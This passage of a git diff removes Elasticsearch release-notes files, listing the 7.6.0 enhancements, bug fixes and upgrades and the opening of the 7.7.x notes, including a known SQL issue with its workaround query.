derivatives for each -new tree which is trained for both regression and classification {ml-pull}811[#811] -* Emit `prediction_probability` field alongside prediction field in ml results {ml-pull}818[#818] -* Reduce memory usage of {ml} native processes on Windows {ml-pull}844[#844] -* Reduce runtime of classification and regression {ml-pull}863[#863] -* Stop early training a classification and regression forest when the validation -error is no longer decreasing {ml-pull}875[#875] -* Emit `prediction_field_name` in data frame analytics results using the type -provided as `prediction_field_type` parameter {ml-pull}877[#877] -* Improve performance updating quantile estimates {ml-pull}881[#881] -* Migrate to use Bayesian optimisation for initial hyperparameter value line -searches and stop early if the expected improvement is too small {ml-pull}903[#903] -* Stop cross-validation early if the predicted test loss has a small chance of -being smaller than for the best parameter values found so far {ml-pull}915[#915] -* Optimize decision threshold for classification to 
maximize minimum class recall {ml-pull}926[#926] -* Include categorization memory usage in the `model_bytes` field in -`model_size_stats`, so that it is taken into account in node assignment -decisions {ml-pull}927[#927] (issue: {ml-issue}724[#724]) - -Mapping:: -* Add telemetry for flattened fields. {es-pull}48972[#48972] - -Network:: -* Add certutil http command {es-pull}49827[#49827] -* Do not load SSLService in plugin constructor {es-pull}49667[#49667] (issue: {es-issue}44536[#44536]) -* Netty4: switch to composite cumulator {es-pull}49478[#49478] -* Add the simple strategy to cluster settings {es-pull}49414[#49414] (issue: {es-issue}49067[#49067]) -* Deprecate misconfigured SSL server config {es-pull}49280[#49280] (issue: {es-issue}45892[#45892]) -* Improved diagnostics for TLS trust failures {es-pull}48911[#48911] - -Percolator:: -* Refactor percolator's QueryAnalyzer to use QueryVisitors {es-pull}49238[#49238] (issue: {es-issue}45639[#45639]) - -Ranking:: -* Support `search_type` in Rank Evaluation API {es-pull}48542[#48542] (issue: {es-issue}48503[#48503]) - -Recovery:: -* Use peer recovery retention leases for indices without soft-deletes {es-pull}50351[#50351] (issues: {es-issue}45136[#45136], {es-issue}46959[#46959]) -* Recovery buffer size 16B smaller {es-pull}50100[#50100] - -Reindex:: -* Reindex sort deprecation warning take 2 {es-pull}49855[#49855] (issue: {es-issue}49458[#49458]) - -SQL:: -* SQL: Handle uberjar scenario where the ES jdbc driver file is bundled in another jar {es-pull}51856[#51856] (issue: {es-issue}50201[#50201]) -* SQL: add trace logging for search responses coming from server {es-pull}50530[#50530] -* SQL: Add TRUNC alias for TRUNCATE {es-pull}49571[#49571] (issue: {es-issue}41195[#41195]) -* SQL: binary communication implementation for drivers and the CLI {es-pull}48261[#48261] (issue: {es-issue}47785[#47785]) -* SQL: Verify Full-Text Search functions not allowed in SELECT {es-pull}51568[#51568] (issue: {es-issue}47446[#47446]) - - -Search:: -* Add Validation for maxQueryTerms to be greater than 0 for MoreLikeThisQuery {es-pull}49966[#49966] (issue: {es-issue}49927[#49927]) -* Optimize numeric sort on match_all queries {es-pull}49717[#49717] (issue: {es-issue}48804[#48804]) -* Pre-sort shards based on the max/min value of the primary sort field {es-pull}49092[#49092] (issue: {es-issue}49091[#49091]) -* Optimize sort on long field {es-pull}48804[#48804] -* Search optimisation - add canMatch early aborts for queries on "_index" field {es-pull}48681[#48681] (issue: {es-issue}48473[#48473]) -* #48475 Pure disjunctions should rewrite to a MatchNoneQueryBuilder {es-pull}48557[#48557] -* Disable caching when queries are profiled {es-pull}48195[#48195] (issue: {es-issue}33298[#33298]) -* BlendedTermQuery's equals method should consider boosts {es-pull}48193[#48193] (issue: {es-issue}48184[#48184]) -* Increase the number of vector dims to 2048 {es-pull}46895[#46895] - -Security:: -* Make .async-search-* a restricted namespace {es-pull}50294[#50294] -* Security should not reload files that haven't changed {es-pull}50207[#50207] (issue: {es-issue}50063[#50063]) - -Snapshot/Restore:: -* Use Cluster State to Track Repository Generation {es-pull}49729[#49729] (issue: {es-issue}49060[#49060]) -* Track Repository Gen.
in BlobStoreRepository {es-pull}48944[#48944] (issues: {es-issue}38941[#38941], {es-issue}47520[#47520], {es-issue}47834[#47834], {es-issue}49048[#49048]) -* Restore from Individual Shard Snapshot Files in Parallel {es-pull}48110[#48110] (issue: {es-issue}42791[#42791]) -* Track Shard-Snapshot Index Generation at Repository Root {es-pull}46250[#46250] (issues: {es-issue}38941[#38941], {es-issue}45736[#45736]) - -Store:: -* mmap dim files in HybridDirectory {es-pull}49272[#49272] (issue: {es-issue}48509[#48509]) - -Transform:: -* Improve force stop robustness in case of an error {es-pull}51072[#51072] -* Add actual timeout in message {es-pull}50140[#50140] -* Automatic deletion of old checkpoints {es-pull}49496[#49496] -* Improve error handling of script errors {es-pull}48887[#48887] (issue: {es-issue}48467[#48467]) -* Add `wait_for_checkpoint` flag to stop {es-pull}47935[#47935] (issue: {es-issue}45293[#45293]) - - - -[[bug-7.6.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Use #name() instead of #simpleName() when generating doc values {es-pull}51920[#51920] (issues: {es-issue}50307[#50307], {es-issue}51847[#51847]) -* Fix a sneaky bug in rare_terms {es-pull}51868[#51868] (issue: {es-issue}51020[#51020]) -* Support time_zone on composite's date_histogram {es-pull}51172[#51172] (issues: {es-issue}45199[#45199], {es-issue}45200[#45200]) -* Fix format problem in composite of unmapped {es-pull}50869[#50869] (issue: {es-issue}50600[#50600]) -* SingleBucket aggs need to reduce their bucket's pipelines first {es-pull}50103[#50103] (issue: {es-issue}50054[#50054]) -* Avoid precision loss in DocValueFormat.RAW#parseLong {es-pull}49063[#49063] (issue: {es-issue}38692[#38692]) -* Fix ignoring missing values in min/max aggregations {es-pull}48970[#48970] (issue: {es-issue}48905[#48905]) - -Allocation:: -* Collect shard sizes for closed indices {es-pull}50645[#50645] (issue: {es-issue}33888[#33888]) -* Auto-expand replicated closed indices {es-pull}48973[#48973] -* Ignore dangling indices created in newer versions {es-pull}48652[#48652] (issue: {es-issue}34264[#34264]) -* Handle negative free disk space in deciders {es-pull}48392[#48392] (issue: {es-issue}48380[#48380]) - -Analysis:: -* Fix caching for PreConfiguredTokenFilter {es-pull}50912[#50912] (issue: {es-issue}50734[#50734]) -* Throw Error on deprecated nGram and edgeNGram custom filters {es-pull}50376[#50376] (issue: {es-issue}50360[#50360]) -* _analyze api does not correctly use normalizers when specified {es-pull}48866[#48866] (issue: {es-issue}48650[#48650]) - -Audit:: -* Audit log filter and marker {es-pull}45456[#45456] (issue: {es-issue}47251[#47251]) - -Authentication:: -* Preserve ApiKey credentials for async verification {es-pull}51244[#51244] -* Don't fallback to anonymous for tokens/apikeys {es-pull}51042[#51042] (issue: {es-issue}50171[#50171]) -* Populate User metadata with OpenIDConnect collections {es-pull}50521[#50521] (issue: {es-issue}50250[#50250]) -* Always return 401 for not valid tokens {es-pull}49736[#49736] (issue: {es-issue}38866[#38866]) -* Fix iterate-from-1 bug in smart realm order {es-pull}49473[#49473] -* Remove unnecessary details logged for OIDC {es-pull}48746[#48746] -* Add owner flag parameter to the rest spec {es-pull}48500[#48500] (issue: {es-issue}48499[#48499]) - -Authorization:: -* Fix memory leak in DLS bitset cache {es-pull}50635[#50635] (issue: {es-issue}49261[#49261]) -* Validate field permissions when creating a role {es-pull}50212[#50212] (issues: {es-issue}46275[#46275], 
{es-issue}48108[#48108]) -* Validate field permissions when creating a role {es-pull}48108[#48108] (issue: {es-issue}46275[#46275]) - -CCR:: -* CCR should auto-retry rejected execution exceptions {es-pull}49213[#49213] - -CRUD:: -* Block too many concurrent mapping updates {es-pull}51038[#51038] (issue: {es-issue}50670[#50670]) -* Ensure meta and document field maps are never null in GetResult {es-pull}50112[#50112] (issue: {es-issue}48215[#48215]) -* Replicate write actions before fsyncing them {es-pull}49746[#49746] -* Do not mutate request on scripted upsert {es-pull}49578[#49578] (issue: {es-issue}48670[#48670]) -* Fix Transport Stopped Exception {es-pull}48930[#48930] (issue: {es-issue}42612[#42612]) -* Return consistent source in updates {es-pull}48707[#48707] -* Close query cache on index service creation failure {es-pull}48230[#48230] (issue: {es-issue}48186[#48186]) - -Cluster Coordination:: -* Import replicated closed dangling indices {es-pull}50649[#50649] -* Ignore metadata of deleted indices at start {es-pull}48918[#48918] -* Make elasticsearch-node tools custom metadata-aware {es-pull}48390[#48390] - -Discovery-Plugins:: -* Make EC2 Discovery Cache Empty Seed Hosts List {es-pull}50607[#50607] (issue: {es-issue}50550[#50550]) -* Make EC2 Discovery Plugin Retry Requests {es-pull}50550[#50550] (issue: {es-issue}50462[#50462]) - -Distributed:: -* Exclude nested documents in LuceneChangesSnapshot {es-pull}51279[#51279] -* Closed shard should never open new engine {es-pull}47186[#47186] (issues: {es-issue}45263[#45263], {es-issue}47060[#47060]) -* Fix meta version of task index mapping {es-pull}50363[#50363] (issue: {es-issue}48393[#48393]) - -Engine:: -* Do not wrap soft-deletes reader for segment stats {es-pull}51331[#51331] (issues: {es-issue}51192[#51192], {es-issue}51303[#51303]) -* Account soft-deletes in FrozenEngine {es-pull}51192[#51192] (issue: {es-issue}50775[#50775]) -* Account trimAboveSeqNo in committed translog generation {es-pull}50205[#50205] (issue: {es-issue}49970[#49970]) -* Greedily advance safe commit on new global checkpoint {es-pull}48559[#48559] (issue: {es-issue}48532[#48532]) -* Do not ignore exception when trim unreferenced readers {es-pull}48470[#48470] - -Features/Features:: -* Fix X-Pack SchedulerEngine Shutdown {es-pull}48951[#48951] - -Features/ILM+SLM:: -* Fix SLM check for restore in progress {es-pull}50868[#50868] -* Handle failure to retrieve ILM policy step better {es-pull}49193[#49193] (issue: {es-issue}49128[#49128]) -* Don't halt policy execution on policy trigger exception {es-pull}49128[#49128] -* Re-read policy phase JSON when using ILM's move-to-step API {es-pull}48827[#48827] -* Don't schedule SLM jobs when services have been stopped {es-pull}48658[#48658] (issue: {es-issue}47749[#47749]) -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48367[#48367] -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48361[#48361] -* Add SLM support to xpack usage and info APIs {es-pull}48096[#48096] (issue: {es-issue}43663[#43663]) -* Change policy_id to list type in slm.get_lifecycle {es-pull}47766[#47766] (issue: {es-issue}47765[#47765]) - -Features/Ingest:: -* Fix ignore_missing in CsvProcessor {es-pull}51600[#51600] -* Don't overwrite target field with SetSecurityUserProcessor {es-pull}51454[#51454] (issue: {es-issue}51428[#51428]) -* Fix ingest simulate response document order if processor executes async {es-pull}50244[#50244] -* Allow list of IPs in geoip ingest processor {es-pull}49573[#49573] 
(issue: {es-issue}46193[#46193]) -* Do not wrap ingest processor exception with IAE {es-pull}48816[#48816] (issue: {es-issue}48810[#48810]) -* Introduce dedicated ingest processor exception {es-pull}48810[#48810] (issue: {es-issue}48803[#48803]) - -Features/Java High Level REST Client:: -* Support es7 node http publish_address format {es-pull}49279[#49279] (issue: {es-issue}48950[#48950]) -* Add slices to delete and update by query in HLRC {es-pull}48420[#48420] -* fix incorrect comparison {es-pull}48208[#48208] -* Fix HLRC parsing of CancelTasks response {es-pull}47017[#47017] -* Prevent deadlock by using separate schedulers {es-pull}48697[#48697] (issues: {es-issue}41451[#41451], {es-issue}47599[#47599]) - -Features/Java Low Level REST Client:: -* Improve warning value extraction performance in Response {es-pull}50208[#50208] (issue: {es-issue}24114[#24114]) - -Features/Monitoring:: -* Validate exporter type is HTTP for HTTP exporter {es-pull}49992[#49992] (issues: {es-issue}47246[#47246], {es-issue}47711[#47711], {es-issue}49942[#49942]) -* APM system_user {es-pull}47668[#47668] (issues: {es-issue}2708[#2708], {es-issue}40876[#40876]) - -Geo:: -* Guard against null geoBoundingBox {es-pull}50506[#50506] (issue: {es-issue}50505[#50505]) -* Geo: Switch generated GeoJson type names to camel case (#50285) {es-pull}50400[#50400] (issue: {es-issue}49568[#49568]) -* Geo: Switch generated WKT to upper case {es-pull}50285[#50285] (issue: {es-issue}49568[#49568]) -* Fix typo when assigning null_value in GeoPointFieldMapper {es-pull}49645[#49645] -* Fix handling of circles in legacy geo_shape queries {es-pull}49410[#49410] (issue: {es-issue}49296[#49296]) -* GEO: intersects search for geo_shape return wrong result {es-pull}49017[#49017] -* Geo: improve handling of out of bounds points in linestrings {es-pull}47939[#47939] (issue: {es-issue}43916[#43916]) - -Highlighting:: -* Fix invalid break iterator highlighting on keyword field {es-pull}49566[#49566] - -Infra/Core:: -* Ignore virtual ethernet devices that disappear {es-pull}51581[#51581] (issue: {es-issue}49914[#49914]) -* Guess root cause support unwrap {es-pull}50525[#50525] (issue: {es-issue}50417[#50417]) -* Allow parsing timezone without fully provided time {es-pull}50178[#50178] (issue: {es-issue}49351[#49351]) -* [Java.time] Retain prefixed date pattern in formatter {es-pull}48703[#48703] (issue: {es-issue}48698[#48698]) -* Don't drop user's MaxDirectMemorySize flag on jdk8/windows {es-pull}48657[#48657] (issues: {es-issue}44174[#44174], {es-issue}48365[#48365]) -* Warn when MaxDirectMemorySize may be incorrect (Windows/JDK8 only issue) {es-pull}48365[#48365] (issue: {es-issue}47384[#47384]) -* [Java.time] Calculate week of a year with ISO rules {es-pull}48209[#48209] (issues: {es-issue}41670[#41670], {es-issue}42588[#42588], {es-issue}43275[#43275], {es-issue}43652[#43652]) - -Infra/Logging:: -* Slow log must use separate underlying logger for each index {es-pull}47234[#47234] (issue: {es-issue}42432[#42432]) - -Infra/Packaging:: -* Extend systemd timeout during startup {es-pull}49784[#49784] (issue: {es-issue}49593[#49593]) - -Infra/REST API:: -* Return 400 when handling invalid JSON {es-pull}49552[#49552] (issue: {es-issue}49428[#49428]) -* Slash missed in indices.put_mapping url {es-pull}49468[#49468] - -Machine Learning:: -* Fix 2 digit year regex in find_file_structure {es-pull}51469[#51469] -* Validate classification `dependent_variable` cardinality is at least two {es-pull}51232[#51232] -* Do not copy mapping from dependent 
variable to prediction field in regression analysis {es-pull}51227[#51227] -* Handle nested and aliased fields correctly when copying mapping {es-pull}50918[#50918] (issue: {es-issue}50787[#50787]) -* Fix off-by-one error in `ml_classic` tokenizer end offset {es-pull}50655[#50655] -* Improve uniqueness of result document IDs {es-pull}50644[#50644] (issue: {es-issue}50613[#50613]) -* Fix accuracy metric in multi-class confusion matrix {es-pull}50310[#50310] (issue: {es-issue}48759[#48759]) -* Fix race condition when stopping a data frame analytics jobs immediately after starting it {es-pull}50276[#50276] (issues: {es-issue}49680[#49680], {es-issue}50177[#50177]) -* Apply source query on data frame analytics memory estimation {es-pull}49517[#49517] (issue: {es-issue}49454[#49454]) -* Fix r_squared eval when variance is 0 {es-pull}49439[#49439] -* Blacklist a number of prediction field names {es-pull}49371[#49371] (issue: {es-issue}48808[#48808]) -* Make data frame analytics more robust for very short-lived analyses {es-pull}49282[#49282] (issue: {es-issue}49095[#49095]) -* Fixes potential memory corruption when determining seasonality {ml-pull}852[#852] -* Prevent `prediction_field_name` clashing with other fields in {ml} results {ml-pull}861[#861] -* Include out-of-order as well as in-order terms in categorization reverse searches {ml-pull}950[#950] (issue: {ml-issue}949[#949]) - -Mapping:: -* Ensure that field collapsing works with field aliases. {es-pull}50722[#50722] (issues: {es-issue}32648[#32648], {es-issue}50121[#50121]) -* Improve DateFieldMapper `ignore_malformed` handling {es-pull}50090[#50090] (issues: {es-issue}46675[#46675], {es-issue}50081[#50081]) -* Annotated text type should extend TextFieldType {es-pull}49555[#49555] (issue: {es-issue}49289[#49289]) -* Ensure parameters are updated when merging flattened mappings. {es-pull}48971[#48971] (issue: {es-issue}48907[#48907]) - -Network:: -* Fix TransportMasterNodeAction not Retrying NodeClosedException {es-pull}51325[#51325] - -Percolator:: -* Correctly handle MSM for nested disjunctions {es-pull}50669[#50669] (issue: {es-issue}50305[#50305]) -* Fix query analyzer logic for mixed conjunctions of terms and ranges {es-pull}49803[#49803] (issue: {es-issue}49684[#49684]) - -Recovery:: -* Check allocation id when failing shard on recovery {es-pull}50656[#50656] (issue: {es-issue}50508[#50508]) -* Migrate peer recovery from translog to retention lease {es-pull}49448[#49448] (issue: {es-issue}45136[#45136]) -* Ignore Lucene index in peer recovery if translog corrupted {es-pull}49114[#49114] - -Reindex:: -* Reindex and friends fail on RED shards {es-pull}45830[#45830] (issues: {es-issue}42612[#42612], {es-issue}45739[#45739]) - -SQL:: -* SQL: Fix milliseconds handling in intervals {es-pull}51675[#51675] (issue: {es-issue}41635[#41635]) -* SQL: Fix ORDER BY YEAR() function {es-pull}51562[#51562] (issue: {es-issue}51224[#51224]) -* SQL: change the way unsupported data types fields are handled {es-pull}50823[#50823] -* SQL: Optimisation fixes for conjunction merges {es-pull}50703[#50703] (issue: {es-issue}49637[#49637]) -* SQL: Fix issue with CAST and NULL checking. 
{es-pull}50371[#50371] (issue: {es-issue}50191[#50191]) -* SQL: fix NPE for JdbcResultSet.getDate(param, Calendar) calls {es-pull}50184[#50184] (issue: {es-issue}50174[#50174]) -* SQL: COUNT DISTINCT returns 0 instead of NULL for no matching docs {es-pull}50037[#50037] (issue: {es-issue}50013[#50013]) -* Fix LOCATE function optional parameter handling {es-pull}49666[#49666] (issue: {es-issue}49557[#49557]) -* Fix NULL handling for FLOOR and CEIL functions {es-pull}49644[#49644] (issue: {es-issue}49556[#49556]) -* Handle NULL arithmetic operations with INTERVALs {es-pull}49633[#49633] (issue: {es-issue}49297[#49297]) -* Fix issue with GROUP BY YEAR() {es-pull}49559[#49559] (issue: {es-issue}49386[#49386]) -* Fix issue with CASE/IIF pre-calculating results {es-pull}49553[#49553] (issue: {es-issue}49388[#49388]) -* Fix issue with folding of CASE/IIF {es-pull}49449[#49449] (issue: {es-issue}49387[#49387]) -* Fix issues with WEEK/ISO_WEEK/DATEDIFF {es-pull}49405[#49405] (issues: {es-issue}48209[#48209], {es-issue}49376[#49376]) -* SQL: Fix issue with mins & hours for DATEDIFF {es-pull}49252[#49252] -* SQL: Failing Group By queries due to different ExpressionIds {es-pull}43072[#43072] (issues: {es-issue}33361[#33361], {es-issue}34543[#34543], {es-issue}36074[#36074], {es-issue}37044[#37044], {es-issue}40001[#40001], {es-issue}40240[#40240], {es-issue}41159[#41159], {es-issue}42041[#42041], {es-issue}46316[#46316]) - -Search:: -* Fix upgrade of custom similarity {es-pull}50851[#50851] (issue: {es-issue}50763[#50763]) -* Fix NPE bug inner_hits {es-pull}50709[#50709] (issue: {es-issue}50539[#50539]) -* Collect results in a local list when notifying partial results {es-pull}49828[#49828] (issue: {es-issue}49778[#49778]) -* Fixes a bug in interval filter serialization {es-pull}49793[#49793] (issue: {es-issue}49519[#49519]) -* Correctly handle duplicates in unordered interval matching {es-pull}49775[#49775] -* Correct rewritting of script_score query {es-pull}48425[#48425] (issue: {es-issue}48081[#48081]) -* Do not throw errors on unknown types in SearchAfterBuilder {es-pull}48147[#48147] (issue: {es-issue}48074[#48074]) - -Security:: -* Always consume the body in has privileges {es-pull}50298[#50298] (issue: {es-issue}50288[#50288]) - -Snapshot/Restore:: -* Fix Overly Aggressive Request DeDuplication {es-pull}51270[#51270] (issue: {es-issue}51253[#51253]) -* Guard Repository#getRepositoryData for exception throw {es-pull}50970[#50970] -* Fix Index Deletion During Partial Snapshot Create {es-pull}50234[#50234] (issues: {es-issue}50200[#50200], {es-issue}50202[#50202]) -* Fix Index Deletion during Snapshot Finalization {es-pull}50202[#50202] (issues: {es-issue}45689[#45689], {es-issue}50200[#50200]) -* Fix RepoCleanup not Removed on Master-Failover {es-pull}49217[#49217] -* Make FsBlobContainer Listing Resilient to Concurrent Modifications {es-pull}49142[#49142] (issue: {es-issue}37581[#37581]) -* Fix SnapshotShardStatus Reporting for Failed Shard {es-pull}48556[#48556] (issue: {es-issue}48526[#48526]) -* Cleanup Concurrent RepositoryData Loading {es-pull}48329[#48329] (issue: {es-issue}48122[#48122]) - -Transform:: -* Fix mapping deduction for scaled_float {es-pull}51990[#51990] (issue: {es-issue}51780[#51780]) -* Fix stats can return old state information if security is enabled {es-pull}51732[#51732] (issue: {es-issue}51728[#51728]) -* Fail to start/put on missing pipeline {es-pull}50701[#50701] (issue: {es-issue}50135[#50135]) -* Fix possible audit logging disappearance after rolling upgrade 
{es-pull}49731[#49731] (issue: {es-issue}49730[#49730]) -* Do not fail checkpoint creation due to global checkpoint mismatch {es-pull}48423[#48423] (issue: {es-issue}48379[#48379]) - - - -[[upgrade-7.6.0]] -[discrete] -=== Upgrades - -Engine:: -* Upgrade to Lucene 8.4.0. {es-pull}50518[#50518] - -Infra/Packaging:: -* Upgrade the bundled JDK to JDK 13.0.2 {es-pull}51511[#51511] diff --git a/docs/reference/release-notes/7.7.asciidoc b/docs/reference/release-notes/7.7.asciidoc deleted file mode 100644 index de7ec59aa46..00000000000 --- a/docs/reference/release-notes/7.7.asciidoc +++ /dev/null @@ -1,802 +0,0 @@ -[[release-notes-7.7.1]] -== {es} version 7.7.1 - -Also see <>. - -[[known-issues-7.7.1]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[enhancement-7.7.1]] -[discrete] -=== Enhancements - -Authorization:: -* Remove synthetic role names of API keys as they confuse users {es-pull}56005[#56005] - -Features/ILM+SLM:: -* ILM: Add cluster update timeout on step retry {es-pull}54878[#54878] - -SQL:: -* Change error message for comparison against fields in filtering {es-pull}57126[#57126] (issue: {es-issue}57005[#57005]) - -[[bug-7.7.1]] -[discrete] -=== Bug fixes - -Authentication:: -* Expose idp.metadata.http.refresh for SAML realm {es-pull}56354[#56354] -* Fix concurrent refresh of tokens {es-pull}55114[#55114] (issue: {es-issue}54289[#54289]) - -CCR:: -* Retry follow task when remote connection queue full {es-pull}55314[#55314] - -Cluster Coordination:: -* Fix the problem of recovering twice when perform a full cluster restart(#55564) {es-pull}55780[#55780] (issue: {es-issue}55564[#55564]) - -Discovery-Plugins:: -* Hide c.a.a.p.i.BasicProfileConfigFileLoader noise {es-pull}56346[#56346] (issues: {es-issue}20313[#20313], {es-issue}56333[#56333]) - -Engine:: -* Ensure no circular reference in translog tragic exception {es-pull}55959[#55959] (issue: {es-issue}55893[#55893]) -* Update translog policy before the next safe commit {es-pull}54839[#54839] (issue: {es-issue}52223[#52223]) - -Features/CAT APIs:: -* Handle exceptions when building _cat/indices response {es-pull}56993[#56993] (issue: {es-issue}56816[#56816]) - -Features/Features:: -* 7.x only REST specification fixes {es-pull}56736[#56736] (issue: {es-issue}55984[#55984]) - -Features/ILM+SLM:: -* Fix Missing IgnoredUnavailable Flag in 7.x SLM Retention Task {es-pull}56616[#56616] - -Features/Indices APIs:: -* Allow removing replicas setting on closed indices {es-pull}56680[#56680] (issues: {es-issue}56656[#56656], {es-issue}56675[#56675]) -* Allow removing index.number_of_replicas setting {es-pull}56656[#56656] (issue: {es-issue}56501[#56501]) - -Features/Ingest:: -* Fix enrich coordinator to reject documents instead of deadlocking {es-pull}56247[#56247] (issue: {es-issue}55634[#55634]) -* EnrichProcessorFactory should not throw NPE if missing metadata {es-pull}55977[#55977] -* Prevent stack overflow for numerous grok patterns. 
{es-pull}55899[#55899] -* Fix empty_value handling in CsvProcessor {es-pull}55649[#55649] (issue: {es-issue}55643[#55643]) - -Features/Java High Level REST Client:: -* Honor IndicesOptions in HLRC putMapping request {es-pull}57118[#57118] (issue: {es-issue}57045[#57045]) - -Features/Monitoring:: -* Fix incorrect log warning when exporting monitoring via HTTP without authentication {es-pull}56958[#56958] (issue: {es-issue}56810[#56810]) -* Ensure that the monitoring export exceptions are logged. {es-pull}56237[#56237] - -Features/Watcher:: -* Ensure that .watcher-history-11* template is in installed prior to use {es-pull}56734[#56734] (issue: {es-issue}56732[#56732]) -* Fix smtp.ssl.trust setting for watcher email {es-pull}56090[#56090] (issues: {es-issue}45272[#45272], {es-issue}52153[#52153]) - -Infra/Core:: -* Prevent unexpected native controller output hanging the process {es-pull}56491[#56491] (issue: {es-issue}56366[#56366]) -* Add method to check if object is generically writeable in stream {es-pull}54936[#54936] (issue: {es-issue}54708[#54708]) - -Infra/Logging:: -* SlowLoggers using single logger {es-pull}56708[#56708] (issue: {es-issue}56171[#56171]) - -Machine Learning:: -* Fix background persistence of categorizer state. {ml-pull}1137[#1137] (issue: {ml-issue}1136[#1136]) -* Fix classification job failures when number of classes in configuration differs from the number of classes present in the training data. {ml-pull}1144[#1144] -* Fix underlying cause for "Failed to calculate splitting significance" log errors. {ml-pull}1157[#1157] -* Fix possible root cause for "Bad variance scale nan" log errors. {ml-pull}1225[#1225] -* Change data frame analytics instrumentation timestamp resolution to milliseconds. {ml-pull}1237[#1237] -* Fix "autodetect process stopped unexpectedly: Fatal error: 'terminate called after throwing an instance of 'std::bad_function_call'". 
{ml-pull}1246[#1246] (issue: {ml-issue}1245[#1245]) -* Fix monitoring if orphaned anomaly detector persistent tasks exist {es-pull}57235[#57235] (issue: {es-issue}51888[#51888]) -* Fix delete_expired_data/nightly maintenance when many model snapshots need deleting {es-pull}57041[#57041] (issue: {es-issue}47103[#47103]) -* Ensure class is represented when its cardinality is low {es-pull}56783[#56783] -* Use non-zero timeout when force stopping DF analytics {es-pull}56423[#56423] -* Reduce InferenceProcessor.Factory log spam by not parsing pipelines {es-pull}56020[#56020] (issue: {es-issue}55985[#55985]) -* Audit when unassigned datafeeds are stopped {es-pull}55656[#55656] (issue: {es-issue}55521[#55521]) - -Network:: -* Fix use of password protected PKCS#8 keys for SSL {es-pull}55457[#55457] (issue: {es-issue}8[#8]) -* Add support for more named curves {es-pull}55179[#55179] (issue: {es-issue}55031[#55031]) - -Recovery:: -* Fix trimUnsafeCommits for indices created before 6.2 {es-pull}57187[#57187] (issue: {es-issue}57091[#57091]) - -SQL:: -* Fix unecessary evaluation for CASE/IIF {es-pull}57159[#57159] (issue: {es-issue}49672[#49672]) -* JDBC: fix access to the Manifest for non-entry JAR URLs {es-pull}56797[#56797] (issue: {es-issue}56759[#56759]) -* Fix JDBC url pattern in docs and error message {es-pull}56612[#56612] (issue: {es-issue}56476[#56476]) -* Fix serialization of JDBC prep statement date/time params {es-pull}56492[#56492] (issue: {es-issue}56084[#56084]) -* Fix issue with date range queries and timezone {es-pull}56115[#56115] (issue: {es-issue}56049[#56049]) -* SubSelect unresolved bugfix {es-pull}55956[#55956] - -Search:: -* Don't run sort optimization on size=0 {es-pull}57044[#57044] (issue: {es-issue}56923[#56923]) -* Fix `bool` query behaviour on null value {es-pull}56817[#56817] (issue: {es-issue}56812[#56812]) -* Fix validate query listener invocation bug {es-pull}56157[#56157] -* Async Search: correct shards counting {es-pull}55758[#55758] -* For constant_keyword, make sure exists query handles missing values. {es-pull}55757[#55757] (issue: {es-issue}53545[#53545]) -* Fix (de)serialization of async search failures {es-pull}55688[#55688] -* Fix expiration time in async search response {es-pull}55435[#55435] -* Return true for can_match on idle search shards {es-pull}55428[#55428] (issues: {es-issue}27500[#27500], {es-issue}50043[#50043]) - -Snapshot/Restore:: -* Fix NPE in Partial Snapshot Without Global State {es-pull}55776[#55776] (issue: {es-issue}50234[#50234]) -* Fix Path Style Access Setting Priority {es-pull}55439[#55439] (issue: {es-issue}55407[#55407]) - -[[upgrade-7.7.1]] -[discrete] -=== Upgrades - -Infra/Core:: -* Upgrade to Jackson 2.10.4 {es-pull}56188[#56188] (issue: {es-issue}56071[#56071]) - -Infra/Packaging:: -* Upgrade bundled jdk to 14.0.1 {es-pull}57233[#57233] - -SQL:: -* Update the JLine dependency to 3.14.1 {es-pull}57111[#57111] (issue: {es-issue}57076[#57076]) - -[[release-notes-7.7.0]] -== {es} version 7.7.0 - -Also see <>. - -[[known-issues-7.7.0]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. 
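-The following is a minimal sketch of the affected query shape and its workaround; the
-`emp` index and `languages` field are hypothetical and serve only to illustrate the issue.
-In the affected versions, a query such as
-
-[source,sql]
-----
-SELECT emp_no, languages FROM emp WHERE languages > 2 AND languages != 5;
-----
-
-silently ignores the `languages != 5` inequality. Rewriting the inequality as a `NOT IN`
-returns the intended result:
-
-[source,sql]
-----
-SELECT emp_no, languages FROM emp WHERE languages > 2 AND languages NOT IN (5);
-----
-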
- -[[breaking-7.7.0]] -[discrete] -=== Breaking changes - -Highlighting:: -* Highlighters skip ignored keyword values {es-pull}53408[#53408] (issue: {es-issue}43800[#43800]) - -Infra/Core:: -* Remove DEBUG-level default logging from actions {es-pull}51459[#51459] (issue: {es-issue}51198[#51198]) - -Mapping:: -* Dynamic mappings in indices created on 8.0 and later have stricter validation at mapping update time and - results in a deprecation warning for indices created in Elasticsearch 7.7.0 and later. - (e.g. incorrect analyzer settings or unknown field types). {es-pull}51233[#51233] (issues: {es-issue}17411[#17411], {es-issue}24419[#24419]) - -Search:: -* Make range query rounding consistent {es-pull}50237[#50237] (issue: {es-issue}50009[#50009]) -* Pipeline aggregation validation errors that used to return HTTP - 500s/Internal Server Errors now return 400/Bad Request {es-pull}53669[#53669]. - As a bonus we now return a list of validation errors rather than returning - the first one we encounter. - - - -[[breaking-java-7.7.0]] -[discrete] -=== Breaking Java changes - -Infra/Core:: -* Fix ActionListener.map exception handling {es-pull}50886[#50886] - -Machine Learning:: -* Add expected input field type to trained model config {es-pull}53083[#53083] - -Transform:: -* Enhance the output of preview to return full destination index details {es-pull}53572[#53572] - - - -[[deprecation-7.7.0]] -[discrete] -=== Deprecations - -Allocation:: -* Deprecated support for delaying state recovery pending master nodes {es-pull}53646[#53646] (issue: {es-issue}51806[#51806]) - -Authentication:: -* Add warnings 